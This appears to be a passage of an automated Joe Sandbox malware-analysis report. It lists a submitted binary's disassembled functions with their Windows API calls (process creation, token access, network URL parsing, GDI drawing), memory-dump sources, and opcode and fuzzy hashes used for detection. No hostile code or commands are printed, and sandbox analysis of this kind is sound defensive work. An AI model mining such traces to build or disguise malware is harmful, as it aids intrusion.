                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
                                                    • Instruction ID: 24d027dce4eca1beb4f4cd371b6f1648fb5c7e8e6eef414be7142ff98ab70ee9
                                                    • Opcode Fuzzy Hash: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
                                                    • Instruction Fuzzy Hash: B41146B5D00209EFDB41DF99C4449EEFBB5FF08310F105266E914E3220D775AA558F51
                                                    Function 0068B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0068B8FE
                                                    • _memset.LIBCMT ref: 0068B90D
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C7F20,006C7F64), ref: 0068B93C
                                                    • CloseHandle.KERNEL32 ref: 0068B94E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    • Opcode ID: fed1a5d79324f790a7c79e6404a5866ef47ce78674891aeef00ca046041a5474
                                                    • Instruction ID: 9a4d54588f67de786e8623d4fb30c06b6bf27d12ac20914fe15182c3e691f70e
                                                    • Opcode Fuzzy Hash: fed1a5d79324f790a7c79e6404a5866ef47ce78674891aeef00ca046041a5474
                                                    • Instruction Fuzzy Hash: 42F082B25443107BF3102B61AC89FBB3A5EEB09354F006028FB18D5292D7754D008FBC
                                                    Function 00666E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00666E88
                                                      • Part of subcall function 0066794E: _memset.LIBCMT ref: 00667983
                                                    • _memmove.LIBCMT ref: 00666EAB
                                                    • _memset.LIBCMT ref: 00666EB8
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00666EC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: 67f83a2a80c7ec06f69d1d74cdbf7de04166aadfa3f35e7332431c5eef5e56d8
                                                    • Instruction ID: 244547756a6f65bf146951d8f7e1fdebd747ba979d7fffb9ff7e30fa8e246f9c
                                                    • Opcode Fuzzy Hash: 67f83a2a80c7ec06f69d1d74cdbf7de04166aadfa3f35e7332431c5eef5e56d8
                                                    • Instruction Fuzzy Hash: D8F0543A104210BBCF416F55EC85E49BB2BEF45360F048165FE085F21AC735A911DBB4
                                                    Function 0068C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060135C
                                                      • Part of subcall function 006012F3: BeginPath.GDI32(?), ref: 00601373
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060139C
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068C030
                                                    • LineTo.GDI32(00000000,?,?), ref: 0068C03D
                                                    • EndPath.GDI32(00000000), ref: 0068C04D
                                                    • StrokePath.GDI32(00000000), ref: 0068C05B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: 02ada74fd7b9683e897e1bfdccce32ee517da037083952ca09e9e8229b276cf7
                                                    • Instruction ID: 426a2909033ba96c356bb32e052139c26f0eb47a78be274fc5b843bc649ab1dc
                                                    • Opcode Fuzzy Hash: 02ada74fd7b9683e897e1bfdccce32ee517da037083952ca09e9e8229b276cf7
                                                    • Instruction Fuzzy Hash: 61F0BE31001219BBDB126F50EC09FDE3F5AAF06320F144200FA11650E287B54660DBA9
                                                    Function 0065A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065A399
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A3AC
                                                    • GetCurrentThreadId.KERNEL32 ref: 0065A3B3
                                                    • AttachThreadInput.USER32(00000000), ref: 0065A3BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: d1e56e32b507c5b6a987047037203d8da88dd32b8c6ad97e60c53d220b07aa21
                                                    • Instruction ID: 04a9e64c1013e270bdb2b7c3db5b5374ceadae4f1b9faf6c3d1ab2361129e412
                                                    • Opcode Fuzzy Hash: d1e56e32b507c5b6a987047037203d8da88dd32b8c6ad97e60c53d220b07aa21
                                                    • Instruction Fuzzy Hash: 5FE03931141228BADB201BA2DC0CED73F1EEF167A2F008224FA08C4060D6758594CBA0
                                                    Function 00602218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00602231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0060223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00602250
                                                    • GetStockObject.GDI32(00000005), ref: 00602258
                                                    • GetWindowDC.USER32(?,00000000), ref: 0063C0D3
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0063C0E0
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0063C0F9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0063C112
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0063C132
                                                    • ReleaseDC.USER32(?,00000000), ref: 0063C13D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: b3f3646b4c9b8888d64448d93c16b8fd2ad9efd9ef4c6f05690b6d854501b7bb
                                                    • Instruction ID: c816a154da48c706ad2bc51cbb4d9957e27eb0ee7598234b5ed7cd490f087b39
                                                    • Opcode Fuzzy Hash: b3f3646b4c9b8888d64448d93c16b8fd2ad9efd9ef4c6f05690b6d854501b7bb
                                                    • Instruction Fuzzy Hash: D8E06D32100244FADB215FA4FC0D7D83B12EB15332F108366FAA9580E187724990DB52
                                                    Function 00658C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00658C63
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0065882E), ref: 00658C6A
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0065882E), ref: 00658C77
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0065882E), ref: 00658C7E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: c5ba36164e31158411c99a2121a1fe01256b7b14ab0bd49183cddfc5c26af475
                                                    • Instruction ID: d5b04354bc782e815a6b952f1ecd9a2cd541db6b7cd4df5a76614d6332e4d34d
                                                    • Opcode Fuzzy Hash: c5ba36164e31158411c99a2121a1fe01256b7b14ab0bd49183cddfc5c26af475
                                                    • Instruction Fuzzy Hash: 3DE04636642211AFD7205FB0AD0CB963BAAAF547A2F185928B686DA080EA3484458B61
                                                    Function 00642187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00642187
                                                    • GetDC.USER32(00000000), ref: 00642191
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006421B1
                                                    • ReleaseDC.USER32(?), ref: 006421D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: f347929efc2c04e5b9b69edd2b7e20e52fbe4eab4fe18b6f8b6eff665e298761
                                                    • Instruction ID: dc52d92f04f346092010c95f87449aa4a8a4997b2e846fb8f0cf2fe3fa676f52
                                                    • Opcode Fuzzy Hash: f347929efc2c04e5b9b69edd2b7e20e52fbe4eab4fe18b6f8b6eff665e298761
                                                    • Instruction Fuzzy Hash: 49E01A75840204EFDB419F60C808A9E7BF3EF5C350F208629F95AD7260DB7985929F40
                                                    Function 0064219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 0064219B
                                                    • GetDC.USER32(00000000), ref: 006421A5
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006421B1
                                                    • ReleaseDC.USER32(?), ref: 006421D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 01c6981bbb5c621fa6fb41208c829106933f1a910882c8daea957b465e58d3a7
                                                    • Instruction ID: db5b394ee950b337cb67916b84c75005abe78528ab8f4631459d52dd1fe23588
                                                    • Opcode Fuzzy Hash: 01c6981bbb5c621fa6fb41208c829106933f1a910882c8daea957b465e58d3a7
                                                    • Instruction Fuzzy Hash: 0AE01A75800204AFCB519F70C80869E7BF3EF5C310F108229F95A97260DB3995919F40
                                                    Function 006063A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %i
                                                    • API String ID: 0-950836615
                                                    • Opcode ID: 8ea482d5f3a66d0f2d47a346113c41729be55ccd9a11cbcbd5e94ece2862296b
                                                    • Instruction ID: 4ddb7301a10ef800e7b83c90b3fbe8633d2b84a866bc14caa4344c74ec3db515
                                                    • Opcode Fuzzy Hash: 8ea482d5f3a66d0f2d47a346113c41729be55ccd9a11cbcbd5e94ece2862296b
                                                    • Instruction Fuzzy Hash: FFB1B571D8010A9BCF18DF94C8819EFB7B6EF44310F50812AF902A72D1DB359EA6CB65
                                                    Function 0067B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __itow_s
                                                    • String ID: xrl$xrl
                                                    • API String ID: 3653519197-1954299954
                                                    • Opcode ID: 59ee474899f6dc9fcc1dfc675322b482438ba0b65cbcbc1537d74c7981368f16
                                                    • Instruction ID: 686f489f9da5d1936bed5c57571ec5da9e52e5c92a61e0ccfff5dd30b4d2e7dd
                                                    • Opcode Fuzzy Hash: 59ee474899f6dc9fcc1dfc675322b482438ba0b65cbcbc1537d74c7981368f16
                                                    • Instruction Fuzzy Hash: 46B17E70A00209AFDB14DF54C890EBEB7BAFF58300F14D559F9499B292DB71EA81CB64
                                                    Function 0066B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • __wcsnicmp.LIBCMT ref: 0066B298
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0066B361
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: c0c976816fb1a7fa8d4e83467e0cb7af84637c0f2c107c46641fc51edd7506b0
                                                    • Instruction ID: 96cd4faa152d25c3afe46c9a3ab0a6a3d8c4ba0e282b115784930290391d8481
                                                    • Opcode Fuzzy Hash: c0c976816fb1a7fa8d4e83467e0cb7af84637c0f2c107c46641fc51edd7506b0
                                                    • Instruction Fuzzy Hash: 50616F75A00215EFCB14DB98C891EEEB7B6EB08310F15505AF546EB391DB70AE81CB94
                                                    Function 00648A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: Oaa
                                                    • API String ID: 4104443479-3268679879
                                                    • Opcode ID: c0a17210bdea8f7b2fb9bee48cad05fb1b87c7baf48fa23d694756dcf876eab7
                                                    • Instruction ID: 98eb2c6950339058bcafbc7564f5f68dff3dee69a93a7827318d82897cc8ca14
                                                    • Opcode Fuzzy Hash: c0a17210bdea8f7b2fb9bee48cad05fb1b87c7baf48fa23d694756dcf876eab7
                                                    • Instruction Fuzzy Hash: FE514EB0A00609DFCB65CF68C480AEEBBF2FF45304F14452AE85AD7350EB31A996CB51
                                                    Function 00612AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00612AC8
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00612AE1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 98572cf2042504af539c413ff45108790e112924798365973419028b28495921
                                                    • Instruction ID: 8da6fdbda59f4311aa3df97481e7a4bf662a7cc085c8ea2e1616b844019391cc
                                                    • Opcode Fuzzy Hash: 98572cf2042504af539c413ff45108790e112924798365973419028b28495921
                                                    • Instruction Fuzzy Hash: 105188715187449BD360AF14DC86BAFBBF9FF84310F42884CF2D9410A2DB709928CB2A
                                                    Function 006699BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0060506B: __fread_nolock.LIBCMT ref: 00605089
                                                    • _wcscmp.LIBCMT ref: 00669AAE
                                                    • _wcscmp.LIBCMT ref: 00669AC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 897b7362f6fac4317849db0a52c09d94676f13f69aa336e752e9c73b8d18e2c8
                                                    • Instruction ID: 4c04e0f3f1b5a3e3f9334dd483ef4159fd311c7289416f42a2d756778060fa06
                                                    • Opcode Fuzzy Hash: 897b7362f6fac4317849db0a52c09d94676f13f69aa336e752e9c73b8d18e2c8
                                                    • Instruction Fuzzy Hash: 2241E3B1A40619BADF209AA0DC45FEFBBBEDF45710F00006DB901F72C1DA75AA458BA5
                                                    Function 0064099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID: Dtl$Dtl
                                                    • API String ID: 1473721057-3066943355
                                                    • Opcode ID: 6313b8f83832384c2a56f6d538ed73308ae396656af2631c00fa0b5f6749c5c3
                                                    • Instruction ID: 6a4ad226e4ea70c756c12ec8af31e5f5cdc8d695ebb471157f1977076e7d0bdd
                                                    • Opcode Fuzzy Hash: 6313b8f83832384c2a56f6d538ed73308ae396656af2631c00fa0b5f6749c5c3
                                                    • Instruction Fuzzy Hash: 1C51F6786483418FD758CF59C480A6BBBE2FB99384F54985DE9858B3A1D332EC81CF42
                                                    Function 00672882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00672892
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006728C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: 37a11199be61d6d792587a9c5a70511cf0e940aa76c7aa09e8e0f9fcc8c523bf
                                                    • Instruction ID: 37df47346ce0b41e044cff6d85b71b45fa98822cc54e78c14499aa327d2a5b30
                                                    • Opcode Fuzzy Hash: 37a11199be61d6d792587a9c5a70511cf0e940aa76c7aa09e8e0f9fcc8c523bf
                                                    • Instruction Fuzzy Hash: E931497190011AAFDF459FA1CC85EEEBFBAFF08300F044029E905A62A5DA315A06DB60
